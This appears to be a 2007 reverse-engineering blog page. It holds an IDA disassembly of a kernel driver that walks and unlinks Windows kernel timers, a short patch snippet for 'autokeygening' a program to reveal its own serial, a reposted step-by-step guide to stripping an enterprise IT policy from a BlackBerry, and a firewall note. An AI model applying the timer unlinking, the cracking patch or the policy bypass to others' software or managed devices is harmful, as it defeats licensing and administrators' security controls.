.text:00011080
.text:00011080 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:00011080
.text:00011080 ; Attributes: bp-based frame
.text:00011080
.text:00011080 sub_11080 proc near ; CODE XREF: .text:00011135p
.text:00011080
.text:00011080 var_C = dword ptr -0Ch
.text:00011080 var_8 = dword ptr -8
.text:00011080 var_1 = byte ptr -1
.text:00011080
.text:00011080 mov edi, edi
.text:00011082 push ebp
.text:00011083 mov ebp, esp
.text:00011085 sub esp, 0Ch
.text:00011088 push ebx
.text:00011089 push esi
.text:0001108A push edi
.text:0001108B call sub_11006
.text:00011090 and [ebp+var_8], 0
.text:00011094 and [ebp+var_C], 0
.text:00011098 mov cl, 2
.text:0001109A call ds:KfRaiseIrql
.text:000110A0 mov [ebp+var_1], al
.text:000110A3 call sub_11006
.text:000110A8 mov esi, eax
.text:000110AA push esi
.text:000110AB push offset aTimertableX ; "TimerTable : %x\n"
.text:000110B0 call DbgPrint
.text:000110B5 pop ecx
.text:000110B6 pop ecx
.text:000110B7 mov ebx, esi
.text:000110B9
.text:000110B9 loc_110B9: ; CODE XREF: sub_11080+91j
.text:000110B9 mov edi, [ebx]
.text:000110BB test edi, edi
.text:000110BD jz short loc_11113
.text:000110BF jmp short loc_11100
.text:000110C1 ; ---------------------------------------------------------------------------
.text:000110C1
.text:000110C1 loc_110C1: ; CODE XREF: sub_11080+82j
.text:000110C1 lea esi, [edi-18h]
.text:000110C4 mov eax, [esi+20h]
.text:000110C7 test eax, eax
.text:000110C9 mov edi, [edi]
.text:000110CB jz short loc_11100
.text:000110CD mov ecx, [eax+0Ch]
.text:000110D0 test ecx, ecx
.text:000110D2 jz short loc_11100
.text:000110D4 push ecx
.text:000110D5 call sub_11060
.text:000110DA test eax, eax
.text:000110DC jz short loc_11100
.text:000110DE push dword ptr [esi+14h]
.text:000110E1 push dword ptr [esi+10h]
.text:000110E4 push ecx
.text:000110E5 push offset aFoundDeferredr ; "Found DeferredRoutine %x QuadPart %lld\n"...
.text:000110EA call DbgPrint
.text:000110EF mov eax, [esi+18h]
.text:000110F2 mov esi, [esi+1Ch]
.text:000110F5 add esp, 10h
.text:000110F8 inc [ebp+var_C]
.text:000110FB mov [esi], eax
.text:000110FD mov [eax+4], esi
.text:00011100
.text:00011100 loc_11100: ; CODE XREF: sub_11080+3Fj
.text:00011100 ; sub_11080+4Bj ...
.text:00011100 cmp edi, ebx
.text:00011102 jnz short loc_110C1
.text:00011104 inc [ebp+var_8]
.text:00011107 add ebx, 10h
.text:0001110A cmp [ebp+var_8], 1F4h
.text:00011111 jb short loc_110B9
.text:00011113
.text:00011113 loc_11113: ; CODE XREF: sub_11080+3Dj
.text:00011113 mov cl, [ebp+var_1]
.text:00011116 call ds:KfLowerIrql
.text:0001111C mov eax, [ebp+var_C]
.text:0001111F pop edi
.text:00011120 pop esi
.text:00011121 pop ebx
.text:00011122 leave
.text:00011123 retn
.text:00011123 sub_11080 endp ; sp = 4
.text:00011123
.text:00011123 ; ---------------------------------------------------------------------------
.text:00011124 dd 0CCCCCCCCh
.text:00011128 db 2 dup(0CCh)
.text:0001112A ; ---------------------------------------------------------------------------
.text:0001112A
.text:0001112A loc_1112A: ; CODE XREF: start+3Dj
.text:0001112A push offset aTimerstopDrive ; "TimerStop Driver loaded\n"
.text:0001112F call DbgPrint
.text:00011134 pop ecx
.text:00011135 call sub_11080
.text:0001113A or ecx, 0FFFFFFFFh
.text:0001113D sub ecx, eax
.text:0001113F mov eax, ecx
.text:00011141 retn 8
.text:00011141 ; ---------------------------------------------------------------------------
.text:00011144 dd 0CCCCCCCCh
.text:00011148 db 2 dup(0CCh)
.text:0001114A
.text:0001114A ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
.text:0001114A
.text:0001114A ; Attributes: thunk
.text:0001114A
.text:0001114A DbgPrint proc near ; CODE XREF: sub_11080+30p
.text:0001114A ; sub_11080+6Ap ...
.text:0001114A jmp ds:__imp_DbgPrint
.text:0001114A DbgPrint endp
.text:0001114A
.text:0001114A ; ---------------------------------------------------------------------------
.text:00011150 aFoundDeferredr db 'Found DeferredRoutine %x QuadPart %lld',0Ah,0
.text:00011150 ; DATA XREF: sub_11080+65o
.text:00011178 aTimertableX db 'TimerTable : %x',0Ah,0 ; DATA XREF: sub_11080+2Bo
.text:00011189 align 2
.text:0001118A aTimerstopDrive db 'TimerStop Driver loaded',0Ah,0
.text:0001118A ; DATA XREF: .text:0001112Ao
.text:000111A3 align 80h
.text:000111A3 _text ends
.text:000111A3
.idata:00012000 ; Section 2. (virtual address 00002000)
.idata:00012000 ; Virtual size : 00000093 ( 147.)
.idata:00012000 ; Section size in file : 00000200 ( 512.)
.idata:00012000 ; Offset to raw data for section: 00000600
.idata:00012000 ; Flags 48000040: Data Not pageable Readable
.idata:00012000 ; Alignment : 16 bytes ?
.idata:00012000 ;
.idata:00012000 ; Imports from HAL.dll
.idata:00012000 ;
.idata:00012000 ; ---------------------------------------------------------------------------
.idata:00012000
.idata:00012000 ; Segment type: Externs
.idata:00012000 ; _idata
.idata:00012000 extrn KfRaiseIrql:dword ; DATA XREF: sub_11080+1Ar
.idata:00012004 extrn KfLowerIrql:dword ; DATA XREF: sub_11080+96r
.idata:00012008
.idata:0001200C ;
.idata:0001200C ; Imports from ntoskrnl.exe
.idata:0001200C ;
.idata:0001200C extrn KeTickCount:dword ; DATA XREF: start+17r
.idata:00012010 extrn __imp_DbgPrint:dword ; DATA XREF: DbgPrintr
.idata:00012014 extrn KeInitializeTimer:dword ; DATA XREF: sub_11006+Fr
.idata:00012018 extrn KeSetTimer:dword ; DATA XREF: sub_11006+15r
.idata:0001201C extrn KeCancelTimer:dword ; DATA XREF: sub_11006+3Dr
.idata:00012020
.idata:00012020
.rdata:00012024 ; ---------------------------------------------------------------------------
.rdata:00012024
.rdata:00012024 ; Segment type: Pure data
.rdata:00012024 _rdata segment para public 'DATA' use32
.rdata:00012024 assume cs:_rdata
.rdata:00012024 ;org 12024h
.rdata:00012024 db 0 ;
.rdata:00012025 db 0 ;
.rdata:00012026 db 0 ;
.rdata:00012027 db 0 ;
.rdata:00012028 db 0 ;
.rdata:00012029 db 0 ;
.rdata:0001202A db 0 ;
.rdata:0001202B db 0 ;
.rdata:0001202C db 0 ;
.rdata:0001202D db 0 ;
.rdata:0001202E db 0 ;
.rdata:0001202F db 0 ;
.rdata:00012030 db 0 ;
.rdata:00012031 db 0 ;
.rdata:00012032 db 0 ;
.rdata:00012033 db 0 ;
.rdata:00012034 db 74h ; t
.rdata:00012035 db 0D7h ; +
.rdata:00012036 db 85h ; à
.rdata:00012037 db 45h ; E
.rdata:00012038 db 0 ;
.rdata:00012039 db 0 ;
.rdata:0001203A db 0 ;
.rdata:0001203B db 0 ;
.rdata:0001203C db 2 ;
.rdata:0001203D db 0 ;
.rdata:0001203E db 0 ;
.rdata:0001203F db 0 ;
.rdata:00012040 db 47h ; G
.rdata:00012041 db 0 ;
.rdata:00012042 db 0 ;
.rdata:00012043 db 0 ;
.rdata:00012044 db 4Ch ; L
.rdata:00012045 db 20h ;
.rdata:00012046 db 0 ;
.rdata:00012047 db 0 ;
.rdata:00012048 db 4Ch ; L
.rdata:00012049 db 6 ;
.rdata:0001204A db 0 ;
.rdata:0001204B db 0 ;
.rdata:0001204C db 52h ; R
.rdata:0001204D db 53h ; S
.rdata:0001204E db 44h ; D
.rdata:0001204F db 53h ; S
.rdata:00012050 db 28h ; (
.rdata:00012051 db 99h ; Ö
.rdata:00012052 db 0F9h ; ·
.rdata:00012053 db 64h ; d
.rdata:00012054 db 0A7h ; º
.rdata:00012055 db 0DEh ; ¦
.rdata:00012056 db 5Ch ; \
.rdata:00012057 db 4Fh ; O
.rdata:00012058 db 0B7h ; +
.rdata:00012059 db 1Ah ;
.rdata:0001205A db 88h ; ê
.rdata:0001205B db 4Fh ; O
.rdata:0001205C db 47h ; G
.rdata:0001205D db 0E5h ; s
.rdata:0001205E db 0D3h ; +
.rdata:0001205F db 5Dh ; ]
.rdata:00012060 db 4 ;
.rdata:00012061 db 0 ;
.rdata:00012062 db 0 ;
.rdata:00012063 db 0 ;
.rdata:00012064 db 63h ; c
.rdata:00012065 db 3Ah ; :
.rdata:00012066 db 5Ch ; \
.rdata:00012067 db 74h ; t
.rdata:00012068 db 69h ; i
.rdata:00012069 db 6Dh ; m
.rdata:0001206A db 65h ; e
.rdata:0001206B db 72h ; r
.rdata:0001206C db 73h ; s
.rdata:0001206D db 74h ; t
.rdata:0001206E db 6Fh ; o
.rdata:0001206F db 70h ; p
.rdata:00012070 db 5Ch ; \
.rdata:00012071 db 6Fh ; o
.rdata:00012072 db 62h ; b
.rdata:00012073 db 6Ah ; j
.rdata:00012074 db 66h ; f
.rdata:00012075 db 72h ; r
.rdata:00012076 db 65h ; e
.rdata:00012077 db 5Fh ; _
.rdata:00012078 db 77h ; w
.rdata:00012079 db 6Ch ; l
.rdata:0001207A db 68h ; h
.rdata:0001207B db 5Fh ; _
.rdata:0001207C db 78h ; x
.rdata:0001207D db 38h ; 8
.rdata:0001207E db 36h ; 6
.rdata:0001207F db 5Ch ; \
.rdata:00012080 db 69h ; i
.rdata:00012081 db 33h ; 3
.rdata:00012082 db 38h ; 8
.rdata:00012083 db 36h ; 6
.rdata:00012084 db 5Ch ; \
.rdata:00012085 db 54h ; T
.rdata:00012086 db 69h ; i
.rdata:00012087 db 6Dh ; m
.rdata:00012088 db 65h ; e
.rdata:00012089 db 72h ; r
.rdata:0001208A db 53h ; S
.rdata:0001208B db 74h ; t
.rdata:0001208C db 6Fh ; o
.rdata:0001208D db 70h ; p
.rdata:0001208E db 2Eh ; .
.rdata:0001208F db 70h ; p
.rdata:00012090 db 64h ; d
.rdata:00012091 db 62h ; b
.rdata:00012092 db 0 ;
.rdata:00012093 db 0 ;
.rdata:00012094 db 0 ;
.rdata:00012095 db 0 ;
.rdata:00012096 db 0 ;
.rdata:00012097 db 0 ;
.rdata:00012098 db 0 ;
.rdata:00012099 db 0 ;
.rdata:0001209A db 0 ;
.rdata:0001209B db 0 ;
.rdata:0001209C db 0 ;
.rdata:0001209D db 0 ;
.rdata:0001209E db 0 ;
.rdata:0001209F db 0 ;
.rdata:000120A0 db 0 ;
.rdata:000120A1 db 0 ;
.rdata:000120A2 db 0 ;
.rdata:000120A3 db 0 ;
.rdata:000120A4 db 0 ;
.rdata:000120A5 db 0 ;
.rdata:000120A6 db 0 ;
.rdata:000120A7 db 0 ;
.rdata:000120A8 db 0 ;
.rdata:000120A9 db 0 ;
.rdata:000120AA db 0 ;
.rdata:000120AB db 0 ;
.rdata:000120AC db 0 ;
.rdata:000120AD db 0 ;
.rdata:000120AE db 0 ;
.rdata:000120AF db 0 ;
.rdata:000120B0 db 0 ;
.rdata:000120B1 db 0 ;
.rdata:000120B2 db 0 ;
.rdata:000120B3 db 0 ;
.rdata:000120B4 db 0 ;
.rdata:000120B5 db 0 ;
.rdata:000120B6 db 0 ;
.rdata:000120B7 db 0 ;
.rdata:000120B8 db 0 ;
.rdata:000120B9 db 0 ;
.rdata:000120BA db 0 ;
.rdata:000120BB db 0 ;
.rdata:000120BC db 0 ;
.rdata:000120BD db 0 ;
.rdata:000120BE db 0 ;
.rdata:000120BF db 0 ;
.rdata:000120C0 db 0 ;
.rdata:000120C1 db 0 ;
.rdata:000120C2 db 0 ;
.rdata:000120C3 db 0 ;
.rdata:000120C4 db 0 ;
.rdata:000120C5 db 0 ;
.rdata:000120C6 db 0 ;
.rdata:000120C7 db 0 ;
.rdata:000120C8 db 0 ;
.rdata:000120C9 db 0 ;
.rdata:000120CA db 0 ;
.rdata:000120CB db 0 ;
.rdata:000120CC db 0 ;
.rdata:000120CD db 0 ;
.rdata:000120CE db 0 ;
.rdata:000120CF db 0 ;
.rdata:000120D0 db 0 ;
.rdata:000120D1 db 0 ;
.rdata:000120D2 db 0 ;
.rdata:000120D3 db 0 ;
.rdata:000120D4 db 0 ;
.rdata:000120D5 db 0 ;
.rdata:000120D6 db 0 ;
.rdata:000120D7 db 0 ;
.rdata:000120D8 db 0 ;
.rdata:000120D9 db 0 ;
.rdata:000120DA db 0 ;
.rdata:000120DB db 0 ;
.rdata:000120DC db 0 ;
.rdata:000120DD db 0 ;
.rdata:000120DE db 0 ;
.rdata:000120DF db 0 ;
.rdata:000120E0 db 0 ;
.rdata:000120E1 db 0 ;
.rdata:000120E2 db 0 ;
.rdata:000120E3 db 0 ;
.rdata:000120E4 db 0 ;
.rdata:000120E5 db 0 ;
.rdata:000120E6 db 0 ;
.rdata:000120E7 db 0 ;
.rdata:000120E8 db 0 ;
.rdata:000120E9 db 0 ;
.rdata:000120EA db 0 ;
.rdata:000120EB db 0 ;
.rdata:000120EC db 0 ;
.rdata:000120ED db 0 ;
.rdata:000120EE db 0 ;
.rdata:000120EF db 0 ;
.rdata:000120F0 db 0 ;
.rdata:000120F1 db 0 ;
.rdata:000120F2 db 0 ;
.rdata:000120F3 db 0 ;
.rdata:000120F4 db 0 ;
.rdata:000120F5 db 0 ;
.rdata:000120F6 db 0 ;
.rdata:000120F7 db 0 ;
.rdata:000120F8 db 0 ;
.rdata:000120F9 db 0 ;
.rdata:000120FA db 0 ;
.rdata:000120FB db 0 ;
.rdata:000120FC db 0 ;
.rdata:000120FD db 0 ;
.rdata:000120FE db 0 ;
.rdata:000120FF db 0 ;
.rdata:00012100 db 0 ;
.rdata:00012101 db 0 ;
.rdata:00012102 db 0 ;
.rdata:00012103 db 0 ;
.rdata:00012104 db 0 ;
.rdata:00012105 db 0 ;
.rdata:00012106 db 0 ;
.rdata:00012107 db 0 ;
.rdata:00012108 db 0 ;
.rdata:00012109 db 0 ;
.rdata:0001210A db 0 ;
.rdata:0001210B db 0 ;
.rdata:0001210C db 0 ;
.rdata:0001210D db 0 ;
.rdata:0001210E db 0 ;
.rdata:0001210F db 0 ;
.rdata:00012110 db 0 ;
.rdata:00012111 db 0 ;
.rdata:00012112 db 0 ;
.rdata:00012113 db 0 ;
.rdata:00012114 db 0 ;
.rdata:00012115 db 0 ;
.rdata:00012116 db 0 ;
.rdata:00012117 db 0 ;
.rdata:00012118 db 0 ;
.rdata:00012119 db 0 ;
.rdata:0001211A db 0 ;
.rdata:0001211B db 0 ;
.rdata:0001211C db 0 ;
.rdata:0001211D db 0 ;
.rdata:0001211E db 0 ;
.rdata:0001211F db 0 ;
.rdata:00012120 db 0 ;
.rdata:00012121 db 0 ;
.rdata:00012122 db 0 ;
.rdata:00012123 db 0 ;
.rdata:00012124 db 0 ;
.rdata:00012125 db 0 ;
.rdata:00012126 db 0 ;
.rdata:00012127 db 0 ;
.rdata:00012128 db 0 ;
.rdata:00012129 db 0 ;
.rdata:0001212A db 0 ;
.rdata:0001212B db 0 ;
.rdata:0001212C db 0 ;
.rdata:0001212D db 0 ;
.rdata:0001212E db 0 ;
.rdata:0001212F db 0 ;
.rdata:00012130 db 0 ;
.rdata:00012131 db 0 ;
.rdata:00012132 db 0 ;
.rdata:00012133 db 0 ;
.rdata:00012134 db 0 ;
.rdata:00012135 db 0 ;
.rdata:00012136 db 0 ;
.rdata:00012137 db 0 ;
.rdata:00012138 db 0 ;
.rdata:00012139 db 0 ;
.rdata:0001213A db 0 ;
.rdata:0001213B db 0 ;
.rdata:0001213C db 0 ;
.rdata:0001213D db 0 ;
.rdata:0001213E db 0 ;
.rdata:0001213F db 0 ;
.rdata:00012140 db 0 ;
.rdata:00012141 db 0 ;
.rdata:00012142 db 0 ;
.rdata:00012143 db 0 ;
.rdata:00012144 db 0 ;
.rdata:00012145 db 0 ;
.rdata:00012146 db 0 ;
.rdata:00012147 db 0 ;
.rdata:00012148 db 0 ;
.rdata:00012149 db 0 ;
.rdata:0001214A db 0 ;
.rdata:0001214B db 0 ;
.rdata:0001214C db 0 ;
.rdata:0001214D db 0 ;
.rdata:0001214E db 0 ;
.rdata:0001214F db 0 ;
.rdata:00012150 db 0 ;
.rdata:00012151 db 0 ;
.rdata:00012152 db 0 ;
.rdata:00012153 db 0 ;
.rdata:00012154 db 0 ;
.rdata:00012155 db 0 ;
.rdata:00012156 db 0 ;
.rdata:00012157 db 0 ;
.rdata:00012158 db 0 ;
.rdata:00012159 db 0 ;
.rdata:0001215A db 0 ;
.rdata:0001215B db 0 ;
.rdata:0001215C db 0 ;
.rdata:0001215D db 0 ;
.rdata:0001215E db 0 ;
.rdata:0001215F db 0 ;
.rdata:00012160 db 0 ;
.rdata:00012161 db 0 ;
.rdata:00012162 db 0 ;
.rdata:00012163 db 0 ;
.rdata:00012164 db 0 ;
.rdata:00012165 db 0 ;
.rdata:00012166 db 0 ;
.rdata:00012167 db 0 ;
.rdata:00012168 db 0 ;
.rdata:00012169 db 0 ;
.rdata:0001216A db 0 ;
.rdata:0001216B db 0 ;
.rdata:0001216C db 0 ;
.rdata:0001216D db 0 ;
.rdata:0001216E db 0 ;
.rdata:0001216F db 0 ;
.rdata:00012170 db 0 ;
.rdata:00012171 db 0 ;
.rdata:00012172 db 0 ;
.rdata:00012173 db 0 ;
.rdata:00012174 db 0 ;
.rdata:00012175 db 0 ;
.rdata:00012176 db 0 ;
.rdata:00012177 db 0 ;
.rdata:00012178 db 0 ;
.rdata:00012179 db 0 ;
.rdata:0001217A db 0 ;
.rdata:0001217B db 0 ;
.rdata:0001217C db 0 ;
.rdata:0001217D db 0 ;
.rdata:0001217E db 0 ;
.rdata:0001217F db 0 ;
.rdata:00012180 db 0 ;
.rdata:00012181 db 0 ;
.rdata:00012182 db 0 ;
.rdata:00012183 db 0 ;
.rdata:00012184 db 0 ;
.rdata:00012185 db 0 ;
.rdata:00012186 db 0 ;
.rdata:00012187 db 0 ;
.rdata:00012188 db 0 ;
.rdata:00012189 db 0 ;
.rdata:0001218A db 0 ;
.rdata:0001218B db 0 ;
.rdata:0001218C db 0 ;
.rdata:0001218D db 0 ;
.rdata:0001218E db 0 ;
.rdata:0001218F db 0 ;
.rdata:00012190 db 0 ;
.rdata:00012191 db 0 ;
.rdata:00012192 db 0 ;
.rdata:00012193 db 0 ;
.rdata:00012194 db 0 ;
.rdata:00012195 db 0 ;
.rdata:00012196 db 0 ;
.rdata:00012197 db 0 ;
.rdata:00012198 db 0 ;
.rdata:00012199 db 0 ;
.rdata:0001219A db 0 ;
.rdata:0001219B db 0 ;
.rdata:0001219C db 0 ;
.rdata:0001219D db 0 ;
.rdata:0001219E db 0 ;
.rdata:0001219F db 0 ;
.rdata:000121A0 db 0 ;
.rdata:000121A1 db 0 ;
.rdata:000121A2 db 0 ;
.rdata:000121A3 db 0 ;
.rdata:000121A4 db 0 ;
.rdata:000121A5 db 0 ;
.rdata:000121A6 db 0 ;
.rdata:000121A7 db 0 ;
.rdata:000121A8 db 0 ;
.rdata:000121A9 db 0 ;
.rdata:000121AA db 0 ;
.rdata:000121AB db 0 ;
.rdata:000121AC db 0 ;
.rdata:000121AD db 0 ;
.rdata:000121AE db 0 ;
.rdata:000121AF db 0 ;
.rdata:000121B0 db 0 ;
.rdata:000121B1 db 0 ;
.rdata:000121B2 db 0 ;
.rdata:000121B3 db 0 ;
.rdata:000121B4 db 0 ;
.rdata:000121B5 db 0 ;
.rdata:000121B6 db 0 ;
.rdata:000121B7 db 0 ;
.rdata:000121B8 db 0 ;
.rdata:000121B9 db 0 ;
.rdata:000121BA db 0 ;
.rdata:000121BB db 0 ;
.rdata:000121BC db 0 ;
.rdata:000121BD db 0 ;
.rdata:000121BE db 0 ;
.rdata:000121BF db 0 ;
.rdata:000121C0 db 0 ;
.rdata:000121C1 db 0 ;
.rdata:000121C2 db 0 ;
.rdata:000121C3 db 0 ;
.rdata:000121C4 db 0 ;
.rdata:000121C5 db 0 ;
.rdata:000121C6 db 0 ;
.rdata:000121C7 db 0 ;
.rdata:000121C8 db 0 ;
.rdata:000121C9 db 0 ;
.rdata:000121CA db 0 ;
.rdata:000121CB db 0 ;
.rdata:000121CC db 0 ;
.rdata:000121CD db 0 ;
.rdata:000121CE db 0 ;
.rdata:000121CF db 0 ;
.rdata:000121D0 db 0 ;
.rdata:000121D1 db 0 ;
.rdata:000121D2 db 0 ;
.rdata:000121D3 db 0 ;
.rdata:000121D4 db 0 ;
.rdata:000121D5 db 0 ;
.rdata:000121D6 db 0 ;
.rdata:000121D7 db 0 ;
.rdata:000121D8 db 0 ;
.rdata:000121D9 db 0 ;
.rdata:000121DA db 0 ;
.rdata:000121DB db 0 ;
.rdata:000121DC db 0 ;
.rdata:000121DD db 0 ;
.rdata:000121DE db 0 ;
.rdata:000121DF db 0 ;
.rdata:000121E0 db 0 ;
.rdata:000121E1 db 0 ;
.rdata:000121E2 db 0 ;
.rdata:000121E3 db 0 ;
.rdata:000121E4 db 0 ;
.rdata:000121E5 db 0 ;
.rdata:000121E6 db 0 ;
.rdata:000121E7 db 0 ;
.rdata:000121E8 db 0 ;
.rdata:000121E9 db 0 ;
.rdata:000121EA db 0 ;
.rdata:000121EB db 0 ;
.rdata:000121EC db 0 ;
.rdata:000121ED db 0 ;
.rdata:000121EE db 0 ;
.rdata:000121EF db 0 ;
.rdata:000121F0 db 0 ;
.rdata:000121F1 db 0 ;
.rdata:000121F2 db 0 ;
.rdata:000121F3 db 0 ;
.rdata:000121F4 db 0 ;
.rdata:000121F5 db 0 ;
.rdata:000121F6 db 0 ;
.rdata:000121F7 db 0 ;
.rdata:000121F8 db 0 ;
.rdata:000121F9 db 0 ;
.rdata:000121FA db 0 ;
.rdata:000121FB db 0 ;
.rdata:000121FC db 0 ;
.rdata:000121FD db 0 ;
.rdata:000121FE db 0 ;
.rdata:000121FF db 0 ;
.rdata:000121FF _rdata ends
.rdata:000121FF
.data:00013000 ; Section 3. (virtual address 00003000)
.data:00013000 ; Virtual size : 00000008 ( 8.)
.data:00013000 ; Section size in file : 00000200 ( 512.)
.data:00013000 ; Offset to raw data for section: 00000800
.data:00013000 ; Flags C8000040: Data Not pageable Readable Writable
.data:00013000 ; Alignment : 16 bytes ?
.data:00013000 ; ---------------------------------------------------------------------------
.data:00013000
.data:00013000 ; Segment type: Pure data
.data:00013000 _data segment para public 'DATA' use32
.data:00013000 assume cs:_data
.data:00013000 ;org 13000h
.data:00013000 dword_13000 dd 0BB40E64Eh ; DATA XREF: start+5r
.data:00013000 ; start+1Do ...
.data:00013004 dword_13004 dd 44BF19B1h ; DATA XREF: start+37w
.data:00013008 align 200h
.data:00013008 _data ends
.data:00013008
INIT:00014000 ; Section 4. (virtual address 00004000)
INIT:00014000 ; Virtual size : 00000126 ( 294.)
INIT:00014000 ; Section size in file : 00000200 ( 512.)
INIT:00014000 ; Offset to raw data for section: 00000A00
INIT:00014000 ; Flags E2000020: Text Discardable Executable Readable Writable
INIT:00014000 ; Alignment : 16 bytes ?
INIT:00014000 ; ---------------------------------------------------------------------------
INIT:00014000
INIT:00014000 ; Segment type: Pure code
INIT:00014000 INIT segment para public 'CODE' use32
INIT:00014000 assume cs:INIT
INIT:00014000 ;org 14000h
INIT:00014000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
INIT:00014000 dd 0
INIT:00014004 db 0
INIT:00014005
INIT:00014005 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦
INIT:00014005
INIT:00014005 ; Attributes: bp-based frame
INIT:00014005
INIT:00014005 public start
INIT:00014005 start proc near
INIT:00014005 mov edi, edi
INIT:00014007 push ebp
INIT:00014008 mov ebp, esp
INIT:0001400A mov eax, dword_13000
INIT:0001400F test eax, eax
INIT:00014011 mov ecx, 0BB40E64Eh
INIT:00014016 jz short loc_1401C
INIT:00014018 cmp eax, ecx
INIT:0001401A jnz short loc_1403A
INIT:0001401C
INIT:0001401C loc_1401C: ; CODE XREF: start+11j
INIT:0001401C mov edx, ds:KeTickCount
INIT:00014022 mov eax, offset dword_13000
INIT:00014027 shr eax, 8
INIT:0001402A xor eax, [edx]
INIT:0001402C mov dword_13000, eax
INIT:00014031 jnz short loc_1403A
INIT:00014033 mov eax, ecx
INIT:00014035 mov dword_13000, eax
INIT:0001403A
INIT:0001403A loc_1403A: ; CODE XREF: start+15j
INIT:0001403A ; start+2Cj
INIT:0001403A not eax
INIT:0001403C mov dword_13004, eax
INIT:00014041 pop ebp
INIT:00014042 jmp loc_1112A
INIT:00014042 start endp
INIT:00014042
INIT:00014042 ; ---------------------------------------------------------------------------
INIT:00014047 dd 4090CCh, 2 dup(0), 40F400h, 200C00h, 408400h, 2 dup(0)
INIT:00014047 dd 411E00h, 200000h, 5 dup(0), 411000h, 410200h, 0, 40E600h
INIT:00014047 dd 40DA00h, 40C600h, 40B800h, 40A800h, 0, 4B02A000h, 6E614365h
INIT:00014047 dd 546C6563h, 72656D69h, 4B031E00h, 74655365h, 656D6954h
INIT:00014047 dd 0CD000072h, 49654B02h, 6974696Eh, 7A696C61h, 6D695465h
INIT:00014047 dd 3C007265h, 67624400h, 6E697250h, 27000074h, 54654B03h
INIT:00014047 dd 436B6369h, 746E756Fh, 6F746E00h, 6E726B73h, 78652E6Ch
INIT:00014047 dd 59000065h, 4C664B00h, 7265776Fh, 6C717249h, 4B005A00h
INIT:00014047 dd 69615266h, 72496573h, 48006C71h, 642E4C41h, 6C6Ch, 36h dup(0)
INIT:000141FF align 4
INIT:000141FF INIT ends
INIT:000141FF
INIT:000141FF
INIT:000141FF end start

keygening - the most lazy way possible

2007-02-02T14:56:00.000-05:00

I'm in a kwazy mood I suppose.

A while back there was a doc (by kwazy wabbit I think) floating around on auto keygening. Of course, reversing the protection mechanism is the most academic method and therefore the most leet. Next on the list would be "ripping" the keygen.

Finally...there is the lowest form of keygening that is the most fun; don't even bother to rip the protection code out and put it into a nice gui, just use the program against itself and autokeygen it.

This is the pathetic code from one such exercise....

Style PUSH 10
Title PUSH program.00479DF4
Text PUSH program.00475E08
hOwner PUSH DWORD PTR DS:[EBX+4]
MsgBox CALL DWORD PTR DS:[<&USER32.MessageBoxA>]
Return JMP back

Oh yeah....and don't forget the save the stack variables and restore them

blackberry IT policy

2007-01-30T09:01:00.000-05:00

This is one of those sites that will likley be going away at some point. It's not my work

See original text at http://blackberry.ig3.net/

Unlocking the Blackberry.

First of all, this is not a guide on how to remove carrier information from a Blackberry. If you're unable to use a different SIM card than the one that was originally supplied with your device, look elsewhere. However if, like many others you have a Blackberry that is locked by a BES, meaning you're unable to change certain settings, or install Third Party Applications then read on. Essentially, the problem is that your Blackberry has at some point been connected to a BES (Blackberry Enterprise Server), and this BES has placed a restrictive Security Policy (or IT Policy) on your device. A quick check to see if this is the case can be done by going to Options/Security on your Device. If you see any references to IT Policy whatsoever, then you have a potentially restrictive IT Policy that can be removed.

The Disclaimer/Intended Use.

This guide is intended for use by people that own their own Blackberry, and for whatever reason, have inherited a company's IT Policy on their Device. Really, there are two scenarios where this guide is useful.

You, like me, bought a Blackberry on EBay and are unable to make changes to the settings or install Third Party Applications.
You have a Blackberry that was previously connected to a company's BES and, for whatever reason; you no longer intend to make connections to that BES.

If you're still connected to a Company BES, and simply want to install the latest and greatest Third Party Application I wouldn't recommend this approach. Go talk to your administrators and ask them to grant you the appropriate rights. There are two problems in using this guide to bypass your Company's Security Policy. Firstly, whenever you reconnect to the Company Server, your security settings will revert back to how they were. Secondly, and (perhaps) more importantly, you run the risk of getting fired.

Procedure

Step 1	Ensure the Blackberry Desktop Manager is installed using Blackberry Internet Service, and not Blackberry Enterprise Server. If you are unsure, it would probably be a good idea to uninstall the Desktop Manager and start again. If you don't have the CD that came with your Blackberry, the Software can be downloaded here.
Step 2	Download the file policy.bin and save it in your Blackberry installation directory (C:\Program Files\Research In Motion\BlackBerry).
Step 3	Wipe your Blackberry, creating a backup if necessary. Select Options/Security/Wipe on the Device. If this option is unavailable, you may have to install the latest software on your Blackberry. You need to Download and install the latest Desktop Manger Software, then the latest Handheld Software. Connect your device, open the Desktop Manager, select Application Loader, and follow the prompts.
Step 4	Close the Desktop Manager if it is open.
Step 5	From the Windows Start Menu select Run..., and at the prompt type regedit. In the tree on the left hand side, navigate to: HKEY_Current_Users\Software\Research In Motion\BlackBerry\PolicyManager Right-Click the Policy Manager Folder and select New/String Value. Name the value Path. Now, Double-Click the Path Subkey and set Value Data to: C:\Program Files\Research In Motion\BlackBerry\policy.bin
Step 6	Open the Desktop Manager.
Step 7	Connect the Device.

Verification

Once complete, the Options/Security screen on your Blackberry should not contain references to an IT Policy, you should now be able to change all settings (including password prompts), and install Third Party Applications.

About this Guide.

This guide was born from an amazing amount of frustration shortly after buying a Blackberry 7230 on EBay to test an Application I was working on. It addresses what I consider either a bug or an extremely poorly implemented feature of the Blackberry device, and a problem I'm sure 80 percent of people who buy a Blackberry on EBay face.

Kudos and thanks in particular to 7100simpleisbetter and barjohn of www.blackberryforums.com.

hostile source network decisioning at the application layer

2007-01-17T20:41:00.000-05:00

It always seemed reasonable for to drop packets from hostile networks in baseline firewall configs. Even as early as a 5 years ago a large portion of the attacks (both network and application layer) were coming from a small number of networks. That really has not changed. All my firewall configs have a growing number of netblocks that just get dropped on the floor.

What has changed is the relative percentage of successful application layer attacks versus network layer attacks. So if you can drop the packet that's good, but sometimes it's not good business.

